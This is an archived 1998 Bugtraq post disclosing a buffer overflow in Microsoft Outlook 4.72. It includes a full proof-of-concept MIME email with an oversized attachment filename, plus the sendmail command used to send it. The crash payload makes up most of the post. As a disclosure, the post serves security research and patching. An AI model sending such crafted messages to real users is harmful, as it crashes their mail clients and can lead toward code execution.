Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

One of the Outlook overflows

From: root () RYANSPC COM (Ryan Veety)
Date: Wed, 29 Jul 1998 16:34:54 -0400

There have been a few posts about overflows in MS Outlook, but they have
not told exactly where in the message the overflow exists.  I have found
one of them, within the description of an attachment.  If the filename
given is very large, it makes Outlook crash.  I tried this on Outlook
v4.72.2106.4 on NT 4.0, and on win95.  In both cases it reported an error
at address 0x41414141 (41 == hex A).  Here is the message that caused the
errors:

--------------------------- START HERE --------------------------------

From: <From address here>
To: <To address here>
Subject: test
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806"

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII

test

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Disposition: attachment; 
filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Don't read this text file
--204-1969819122-901726347=:19806--

------------------------ END HERE --------------------------------------

To send the message, save it to a file, set the to: and from:, and run
"sendmail -t < fileyousaved"

It causes Outlook to crash when the user attempts to open or save the
file.  According to a previous post, there are many of these overflows in
the attachment discriptors.  This one requires the user to open the
attachment, but similar overflows may not.

Ryan

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQBtAzWOgPAAAAEDAMLNosknbxL/d/a4xhdleyF1VFAtN7qV0qr88TePfp4D/otw
10dkld3jy09kU1V/KvStWDyVEqX9KWZWholg2YkGupoRvJIUMgRgkpryKzjfbYIg
c4wCPs0kU4Bp8hvUzQAFEbQdUnlhbiBWZWV0eSA8cnlhbkByeWFuc3BjLmNvbT6J
AHUDBRA1joDwJFOAafIb1M0BAVvpAwCBVdN6XNj4JKxFb9/zz1+Lq9HzFSrxW/9S
S+rWDxUU2Yirtp/TM9bxyj4Q4siIUwwlWkS0Mq3uCxss6hw65m2dqX2hlZDsE2Es
lvzSliBaQRGPlWz9z26jtCZgxM5BliQ=
=7G/D
-----END PGP PUBLIC KEY BLOCK-----
Previous By Date Next
Previous By Thread Next

Current thread: